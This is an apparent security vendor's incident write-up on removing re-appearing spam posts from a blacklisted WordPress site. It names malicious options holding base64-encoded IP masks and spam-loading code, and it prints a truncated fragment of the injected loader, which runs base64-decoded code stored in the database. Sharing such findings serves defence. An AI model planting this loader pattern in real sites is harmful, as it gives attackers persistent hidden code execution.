Background
This case of Spam clean-up from Word Press website didn't stand out from the first glance. Customer was blacklisted by Google due to spam posts. As a part of blacklisting removal service we reviewed Google alert and start working. Internal malware scan with Quttera tools quickly identified and verified the infection and type. However, the Spam posts kept re-appearing upon successful clean-ups. This post is a short overview of Spam removal process to give you hints when you search for Spam origin in your websites.
Malware Scan and Investigation
As no suspicious posts were there in Word Press dashboard we started to investigate MySQL database tables content. Spamming posts were found and removed from database. In no time, new posts were added with different spam content. Next thing we checked cache plugins that were installed and removed them to decrease "investigation noise". After that, we dumped content of wpoptions table and investigated its content. During investigation we found two malicious Word Press options wpdcon and wptheme_opt.
wpdcon contained suspicious IP masks encoded with base64
NS4yNTUuMTkyLjAtMTg=
OC4qLiouKg==
MTIuMC4qLio=
For full body see here - http://pastebin.com/uYzXu1B3
These masks are used to recognize whether request came from human visitor
wptheme_opt (http://pastebin.com/cdFLyL9X ) contained actually the body that loaded spam posts into the data base.
When were removed, the missing options started to generate errors upon access to a website. Investigating those errors highlighted the exact injection place.
Following is a dump of the infection:
{{{{
add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("
}}}}
Resolution
As a part of anti-malware services for websites, the re-consideration request has been submitted and Google have removed their alert.
